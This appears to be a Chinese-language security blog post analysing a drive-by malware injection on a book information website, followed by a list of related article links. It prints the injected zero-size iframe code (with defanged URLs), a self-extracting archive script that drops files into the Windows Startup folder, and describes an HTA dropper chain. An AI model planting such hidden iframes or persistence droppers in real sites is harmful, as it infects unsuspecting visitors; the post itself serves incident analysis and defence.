某图书信息网被加入恶意代码

简介: 某图书信息网被加入恶意代码

该图书信息网首页首部被加入代码:

<iframe src=hxxp://www*.book***info**.com.cn/change.htm width=0 height=0 frameborder=0></iframe>

change.htm 的内容为:

/--------
<html>
<iframe src="hxxp://www*.book***info**.com.cn/ind/caohui.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://hk.myblog.yahoo.com/f*4-stu**dent*" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://blog.q**oo*z*a.hk/tmcf4student/" width="0" height="0" frameborder="0"></iframe>
</html>
--------/

hxxp://www*.book***info**.com.cn/ind/caohui.htm 的内容为加入多余空格的利用CHM漏洞的恶意代码,会下载2个文件:

1、caohui.gif 为加入多余空格的脚本程序,文件长度为 117 KB (120,006 字节),功能为:创建并运行c:/caohui.hta。

c:/caohui.hta的功能为:

1)从IE临时文件夹中寻找caohui.css,复制为C:/soft.exe并运行。

2)创建文件c:/wins.bat来删除自己。

caohui.css 其实是一个WinRAR制作的自解压文件,文件长度为 20,006 字节,解压脚本为:

/--------
包含; 下列註解包含自解檔指令碼命令
Path=C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/
SavePath
Silent=1
Overwrite=1
--------/

把文件解压到C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/ 下……

这对使用简体中文版的Windows用户不起作用罢?^_^!

包中的文件为 dnserror.htm,文件长度为 3,260 字节,其中包含代码:

/--------
<iframe src="hxxp://home.tmcss.edu.hk/~t*m*c-02**016/change.htm" width="0" height="0" frameborder="0"></iframe>
--------/


相关文章
|
安全 测试技术 网络安全
2022年中职“网络安全“江西省赛题—B-4:Web安全深入测试
2022年中职“网络安全“江西省赛题—B-4:Web安全深入测试
111 1
|
网络安全 数据库 数据安全/隐私保护
2021年中职“网络安全“江西省赛题—B-10:网页深入
2021年中职“网络安全“江西省赛题—B-10:网页深入
79 0
|
安全 Shell 网络安全
2021年中职“网络安全“江西省赛题—B-1:系统利用与提权
2021年中职“网络安全“江西省赛题—B-1:系统利用与提权
728 0
|
安全
世界图书日图书类网站成挂马重灾区
据瑞星“云安全”系统监测,4月23日是世界图书日,“长兴图书馆”、“我爱电子书”、“武侠小说网”等被黑客挂马,用户浏览这些网站后,会感染木马病毒:Trojan.Win32.KillAV.bal(AV终结者),这个木马会强行关闭电脑中的杀毒软件,窃取用户的帐号密码等个人资料。
993 0
|
Web App开发 安全
黑客挂马紧盯娃娃 儿童节育儿教育网站被挂马
据瑞星“云安全”系统监测,5月31日,“39健康育儿网”、“好得网教育频道”、“湖南教育资源门户网-湘教在线”等大型教育网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Backdoor.Win32.Gpigeon2007.cym(灰鸽子后门病毒),可能会被黑客远程控制。
1021 0
|
安全
警惕黑客三八节攻势 女性时尚网站频遭挂马
“三八”妇女节就要来了,不少女性网站都推出节日专题,以俘获“美人心”。但记者从金山毒霸获悉,在2月份,多个女性时尚类网站遭到黑客的挂马攻击。本周女性网站将迎来浏览量的高峰期,黑客很可能会借此机会加大对此类网站的攻击。
1145 0
|
存储 安全 网络安全
|
安全 数据库 数据安全/隐私保护
黑客入侵Edmodo教育平台,窃取超7千万教师、学生和家长账户信息
本文讲的是黑客入侵Edmodo教育平台,窃取超7千万教师、学生和家长账户信息,近日,据外媒报道称,教育平台Edmodo遭到黑客入侵,数千万用户账户信息泄漏,其中包括用户名、电子邮箱地址以及密码等。目前,这些数据正在暗网中出售。
1956 0